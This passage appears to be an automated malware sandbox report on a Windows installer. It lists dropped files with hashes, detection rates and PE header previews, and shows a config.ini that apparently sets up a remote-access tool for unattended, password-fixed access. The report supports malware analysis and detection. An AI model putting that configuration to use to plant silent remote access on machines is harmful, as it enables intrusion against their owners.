                                                                                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\wjpP1EOX0L.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1179648
                                                                                                                                Entropy (8bit):6.395287124443116
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:RtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5lTxyt:PqTytRFk6ek1L
                                                                                                                                MD5:90FC739C83CD19766ACB562C66A7D0E2
                                                                                                                                SHA1:451F385A53D5FED15E7649E7891E05F231EF549A
                                                                                                                                SHA-256:821BD11693BF4B4B2B9F3C196036E1F4902ABD95FB26873EA6C43E123B8C9431
                                                                                                                                SHA-512:4CB11AD48B7585EF1B70FAC9E3C25610B2F64A16358CD51E32ADCB0B17A6AB1C934AEB10ADAA8E9DDF69B2E2F1D18FE2E87B49B39F89B05EA13AA3205E41296C
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@.......................................@......@..............................@8...0....................................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc........0.......l..............@..@....................................@..@........................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\is-H2GRU.tmp\_isetup\_iscrypt.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2560
                                                                                                                                Entropy (8bit):2.8818118453929262
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\is-H2GRU.tmp\_isetup\_setup64.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6144
                                                                                                                                Entropy (8bit):4.720366600008286
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\wjpP1EOX0L.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1179648
                                                                                                                                Entropy (8bit):6.395287124443116
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:RtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5lTxyt:PqTytRFk6ek1L
                                                                                                                                MD5:90FC739C83CD19766ACB562C66A7D0E2
                                                                                                                                SHA1:451F385A53D5FED15E7649E7891E05F231EF549A
                                                                                                                                SHA-256:821BD11693BF4B4B2B9F3C196036E1F4902ABD95FB26873EA6C43E123B8C9431
                                                                                                                                SHA-512:4CB11AD48B7585EF1B70FAC9E3C25610B2F64A16358CD51E32ADCB0B17A6AB1C934AEB10ADAA8E9DDF69B2E2F1D18FE2E87B49B39F89B05EA13AA3205E41296C
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@.......................................@......@..............................@8...0....................................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc........0.......l..............@..@....................................@..@........................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\3bzcw9.cfg (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):33
                                                                                                                                Entropy (8bit):4.923181998146335
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Xfq1A81DnsGun:C1A7Gun
                                                                                                                                MD5:005E5B1F92F1560540725F159D1542B1
                                                                                                                                SHA1:5E1B84A12D4BD5170803158700B325795E97A3A1
                                                                                                                                SHA-256:4A848BDC62E826571E5D01B16D09935C902B2080CBF913A185B9A33C925CA7D4
                                                                                                                                SHA-512:645B3666626C01B69F6B7E48EC9A61745944485D556769CA87912D2C0FFC68A923434BF84D9EAF4F8CD111F9A58700D865F363A2324B95E408F9019DE0AC7D4A
                                                                                                                                Malicious:false
                                                                                                                                Preview:.^.rz;.#G...l....=.M#.k..f.M...e

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\AstCrp.dll (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):172216
                                                                                                                                Entropy (8bit):6.698242571688099
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:nGhQI/PxvCWRDvcDfo0F5HekeyO54ECV0/sMHL0WPCCb5rAg0Fujx8E0/3xt9qKv:kPxqWYF5HkyDLMsOzrAOL23VqK28j
                                                                                                                                MD5:CF1169A87FE6266C7B457A2424DA69DA
                                                                                                                                SHA1:5ADD67DEFD4CA56C1E9C0B239899EA699B140B64
                                                                                                                                SHA-256:24E01FD95225E260CDD41015A70374A048568D4DF6681B3D44EAABCB1EA03EAF
                                                                                                                                SHA-512:7BF76EB5B4E31A65931AF730909FBF848334BC98DA279E291E186FCAFDC81C76D1EF0EFEC4E00B8EAEDE6F8D130DA8B6B3D3C5DD8C14C6DCD3BCDC7D050A4B66
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.%.).K.).K.).K.r.H.$.K.r.N...K.r.O.?.K...J.-.K.{.H.=.K.{.N...K.{.O...K.r.J...K.).J...K...B.!.K...K.(.K.....(.K.)..(.K...I.(.K.Rich).K.................PE..L.....@a...........!.....t...........V..............................................B.....@.........................`X..h....X..P.......(............|...$...........H..8............................H..@...............8............................text....s.......t.................. ..`.rdata...............x..............@..@.data........p.......P..............@....rsrc...(............\..............@..@.reloc...............b..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\ast.exe (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7543992
                                                                                                                                Entropy (8bit):6.717610928993395
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:98304:q0f/bCIDcCkgVmZqIXrdoXj++CEKDFBaVOGizeKFUtqiAp+hRWmMLlJ7p1:X/bCIPkgVpycKDFqOLNUtqiAz
                                                                                                                                MD5:8002D9E5851728EB024B398CF19DE390
                                                                                                                                SHA1:9A1DC7134F3F6FCCB37DFC4DDDA35DFA2875095E
                                                                                                                                SHA-256:B8DDE42C70D8C4A3511D5EDFFBC9F7F0C03DBDA980E29693E71344F76DA6BB0F
                                                                                                                                SHA-512:6936B6B01F9FC2F2F69DE6AE468A9F7173239BD003AD8B7BC7336C4DD4DB50457E20EC6783B2E8A166D684A56F3F1E9FB701CA903DF3F74E3CA25C46B8A8D00E
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....@a..................K..`'.......K.......K...@...........................y.......s..........@............................S..m....X..f ...........r..$... T.8d............T...............T.....................@.S..............................text... .J.......J................. ..`.itext..$.....J.......J............. ..`.data...T"....K..$....K.............@....bss..........M.......M..................idata...m....S..n....M.............@....tls....D.....T......*N..................rdata..#.....T......*N.............@..@.reloc..8d... T..f...,N.............@..B.rsrc....f ...X..f ...R.............@..@..............y.......r.............@..@................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\astclient.dll (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):581304
                                                                                                                                Entropy (8bit):6.580382227041057
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
                                                                                                                                MD5:CDC5A8221738C1CA66564755BB58138C
                                                                                                                                SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
                                                                                                                                SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
                                                                                                                                SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9...}..O}..O}..O.|*Ol..O.|(O...O.|)Oc..O/..Nd..O/..N...O/..N_..O...Ol..O}..O...O..Nh..O..N|..O.$O|..O}.LO|..O..N|..ORich}..O........PE..L...L..a...........!..... ...........m.......0......................................C.....@.........................0...P...............0................$.......[......p..............................@............0...............................text............ .................. ..`.rdata..H....0.......$..............@..@.data....d... ...D..................@....rsrc...0............X..............@..@.reloc...[.......\...^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\astrct.dll (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1724088
                                                                                                                                Entropy (8bit):6.573221633911959
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSvSSSSSSSSSSSSSSSlwwwwwwwwwwwwwwI:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSO
                                                                                                                                MD5:E0E559010A1CC7CB6B6F754E8833A156
                                                                                                                                SHA1:0ADB286A1511B9D5820B042EE7D059DAEE8D0978
                                                                                                                                SHA-256:A49D90D39BCF0FB183A8E2DFDA90E1B745565DDC25C0CC92ED7068868CB8F3E4
                                                                                                                                SHA-512:3225A22CA8044FAFE03C005C55924B71EC2D3C9EE2325B45703EADC1F912DD867DD7FADCA0652FA2ACD46D4067575377388134E3CC58B13C0F82540224E98221
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......3...w...w...w....5k.o....5i.....5h.h.......Y...w...:...........%...l...%.......%...R....VQ.d...w................v.....e.v...w...v.......v...Richw...........PE..L..._..`...........!.....@...B...............P......................................Q.....@.........................@Z..H....Z..........(............*...$... ..........p...........................P...@............P..|............................text....>.......@.................. ..`.rdata..(....P... ...D..............@..@.data........p...2...d..............@....rodata.@...........................@..@.rsrc...(...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\aw_sas32.dll (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):17648
                                                                                                                                Entropy (8bit):6.317642988990049
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
                                                                                                                                MD5:ACF7048E2347CFD66CD17648DBFBAF45
                                                                                                                                SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
                                                                                                                                SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
                                                                                                                                SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......):5.m[[.m[[.m[[.d#..o[[.d#..c[[.d#..o[[.d#..j[[.m[Z.S[[.d#..k[[.d#..l[[.d#..l[[.Richm[[.........PE..L......K...........!.........................0...............................p............@..........................<..N...|6..P....P...............0.......`..$....................................4..@............0...............................text...;........................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\config.ini (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):586
                                                                                                                                Entropy (8bit):5.203397968860563
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:L1YWzRcSbZKsNlTQ/dw/7y/x5/D++472p+fso+9hffAaJYQMhsK/qI8qP:Z7zRcSbZKKlcMypJD5KxkiaJosBq
                                                                                                                                MD5:5D7974984AE3D593B7887CC7BDA866DD
                                                                                                                                SHA1:9C0B2EC2659812F1E46F2D32F82E61DF223C674C
                                                                                                                                SHA-256:7888BDB632F1BC5EB6DAE5624FE9065868D279E50ACC569D3DDE0F6DB1C95051
                                                                                                                                SHA-512:7BDACFBCE85726A683C3A316F578A88D5991E37C8FB1E13FC4715141F5752E7FD5D145AC36730B637E26FD3198EDE2D27E86F5CF7283A0C9B08579B1056B0B70
                                                                                                                                Malicious:false
                                                                                                                                Preview:[config]..Security.FixPass=4297F44B13955235245B2497399D7A93..Main.Autorun=1..Main.CloseButtonOperation=0..Main.CheckUpdates=0..Security.UseLocalSecuritySettings=1..Security.DynPassKind=0..Security.PassLifetime=0..Security.CanWinAuth=1..Security.AccessKind=1..Security.CanWinLoginAnotherUser=1..Security.UNCONTROLLED_ACCESS=1..Security.CanWinLoginNotAdmin=1..Security.DenyRemoteSettingsControl=0..Security.DenyLockControls=0..Log.ServerStoreTechLog=0..Main.AWAYMODE_REQUIRED=1..Main.LogsLifetime=1..Main.LogsForMail2Support=1..ProxySettings.UseKind=1..ProxySettings.StoreUserAndPassw=1..

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\hatls.dll (copy)

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2236144
                                                                                                                                Entropy (8bit):5.624149670958732
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:2HGHuX4EewGQcPryfFMoxJ+4PulW/ChEIgTS/zRUm:2HGOX4CGQtMs+WuVge/em
                                                                                                                                MD5:BCCF6A5C2595EEA84533692BB788D8BB
                                                                                                                                SHA1:24318226F145E52B7633A4E9E844D6EAD43B75AC
                                                                                                                                SHA-256:ABF75DE674428E112F90F1C618218FF73EF851F4F09C5F5BA8B69E79A6C74DBF
                                                                                                                                SHA-512:78F24F0812AAE31E83340ADEB1A1AE8C00EDFDF483E299706F863CB713BFDC2501B5418CE8F8BD9131E3C704BFFB58A8CA05C5E0A75EB19F15E0409C5B74E35B
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............}...}...}.K....}.K..._.}.K.....}...~..}...y..}.......}...|.W.}...x...}...x...}...}...}......}.......}.......}.Rich..}.................PE..L..."..[...........!.........x.......................................................,"...@.........................P.,.^....s-.P.....-.0.............".......-.....`.+.8...................@.+.......+.@............p-..............................textbss.T...............................text.......p...................... ..`.rdata....... '.....................@..@.data....`....-..@.... .............@....idata.......p-....... .............@..@.msvcjmc......-....... .............@....tls..........-....... .............@....00cfg........-....... .............@..@.rsrc...0.....-....... .............@..@.reloc........-....... .............@..B................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-2EBQK.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):370488
                                                                                                                                Entropy (8bit):6.86993159214619
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                                MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                                SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                                SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                                SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k-...~...~...~.......~....l..~.......~.......~.......~.......~.......~...~...~]...k..~]......~]..~...~]......~Rich...~........PE..L....g._.........."!.................U....... ...................................... .....@..........................^......\h..(.......................8.......l....W...............................W..@............ ...............................text............................... ..`.rdata..6N... ...P..................@..@.data...8....p.......^..............@....rsrc................h..............@..@.reloc..l............j..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-2G518.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):172216
                                                                                                                                Entropy (8bit):6.698242571688099
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:nGhQI/PxvCWRDvcDfo0F5HekeyO54ECV0/sMHL0WPCCb5rAg0Fujx8E0/3xt9qKv:kPxqWYF5HkyDLMsOzrAOL23VqK28j
                                                                                                                                MD5:CF1169A87FE6266C7B457A2424DA69DA
                                                                                                                                SHA1:5ADD67DEFD4CA56C1E9C0B239899EA699B140B64
                                                                                                                                SHA-256:24E01FD95225E260CDD41015A70374A048568D4DF6681B3D44EAABCB1EA03EAF
                                                                                                                                SHA-512:7BF76EB5B4E31A65931AF730909FBF848334BC98DA279E291E186FCAFDC81C76D1EF0EFEC4E00B8EAEDE6F8D130DA8B6B3D3C5DD8C14C6DCD3BCDC7D050A4B66
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.%.).K.).K.).K.r.H.$.K.r.N...K.r.O.?.K...J.-.K.{.H.=.K.{.N...K.{.O...K.r.J...K.).J...K...B.!.K...K.(.K.....(.K.)..(.K...I.(.K.Rich).K.................PE..L.....@a...........!.....t...........V..............................................B.....@.........................`X..h....X..P.......(............|...$...........H..8............................H..@...............8............................text....s.......t.................. ..`.rdata...............x..............@..@.data........p.......P..............@....rsrc...(............\..............@..@.reloc...............b..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-2LPS2.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):33
                                                                                                                                Entropy (8bit):4.923181998146335
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Xfq1A81DnsGun:C1A7Gun
                                                                                                                                MD5:005E5B1F92F1560540725F159D1542B1
                                                                                                                                SHA1:5E1B84A12D4BD5170803158700B325795E97A3A1
                                                                                                                                SHA-256:4A848BDC62E826571E5D01B16D09935C902B2080CBF913A185B9A33C925CA7D4
                                                                                                                                SHA-512:645B3666626C01B69F6B7E48EC9A61745944485D556769CA87912D2C0FFC68A923434BF84D9EAF4F8CD111F9A58700D865F363A2324B95E408F9019DE0AC7D4A
                                                                                                                                Malicious:false
                                                                                                                                Preview:.^.rz;.#G...l....=.M#.k..f.M...e

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-4POLO.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1724088
                                                                                                                                Entropy (8bit):6.573221633911959
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSvSSSSSSSSSSSSSSSlwwwwwwwwwwwwwwI:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSO
                                                                                                                                MD5:E0E559010A1CC7CB6B6F754E8833A156
                                                                                                                                SHA1:0ADB286A1511B9D5820B042EE7D059DAEE8D0978
                                                                                                                                SHA-256:A49D90D39BCF0FB183A8E2DFDA90E1B745565DDC25C0CC92ED7068868CB8F3E4
                                                                                                                                SHA-512:3225A22CA8044FAFE03C005C55924B71EC2D3C9EE2325B45703EADC1F912DD867DD7FADCA0652FA2ACD46D4067575377388134E3CC58B13C0F82540224E98221
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......3...w...w...w....5k.o....5i.....5h.h.......Y...w...:...........%...l...%.......%...R....VQ.d...w................v.....e.v...w...v.......v...Richw...........PE..L..._..`...........!.....@...B...............P......................................Q.....@.........................@Z..H....Z..........(............*...$... ..........p...........................P...@............P..|............................text....>.......@.................. ..`.rdata..(....P... ...D..............@..@.data........p...2...d..............@....rodata.@...........................@..@.rsrc...(...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-4UFKS.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 168x299, components 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8097
                                                                                                                                Entropy (8bit):7.94099711365173
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:E9NXj7fQ9/RRN0AinryQKGgjkrEQtxH1AYZ18r:E9NzjGkOujEQ3H1V8r
                                                                                                                                MD5:2302BC48A162783A6A41C278B3F54145
                                                                                                                                SHA1:8C3272769F604DC3AE6C6B98A29CC779532D1783
                                                                                                                                SHA-256:1E5F58772571897E96CCA5ACB597DF65F8775E64D7031D6B2CCDBF22D5181F51
                                                                                                                                SHA-512:465086DFF63176A864C0BC26BCCFA1FBBA0503F9AFD78A86C863C266469F54069D00BBB718440090A065EA92AD0DD42A67B6A6C99ED6B2378F6A721984A806A6
                                                                                                                                Malicious:false
                                                                                                                                Preview:......JFIF...................................................( ..&...!1!%)+.....383-7(-.+...........-! .--------------------------------------------------......+...."........................................@........................!1.A.."Qaq..2..#BR...3br........CS...s...............................(......................!.1.AQa".2Rq3...............?.........X..R|.[..X[q....9*$........Q.t.......E..Sv+9.[..a.......J..T..9@.F'..-...$..R.S.\...,.).T..+.T..My.S".]zt.....^.{.EXP.....i..z."].'..6G.H.kU.Q..W5..%i..F..n.{4 .n.m.B.O.h..#.=..$..|*...5..|'Z......e?...y>6Z...]....]`..Q.<..)..=....H..N..Z.~....O..qL...j.<.......EE......6Z/P>,....P..i.\..PK.W...5..o.........2.\.t./....j8.3/...|a-%.hx...v.}.Bw.Keck.{....c....G....Z..9o......h.m.Nj..."...j..:...T.n.*Ts........z...K.gl..?O:..F9. /./...,...>...........S.h...m.\..T....5R|..p......cO..g\M.?....3...JB.......4..$....|.[.Z...7...|j..H..r...Y.xcs.e.;...'..%h?..|fh..oV....j...y\gH.x8....'..8..Qe.G.^.c...^u.

                                                                                                                                C:\Users\user\AppData\Local\Temp\mo6x\is-5IUGA.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):713456
                                                                                                                                Entropy (8bit):6.620067101616198
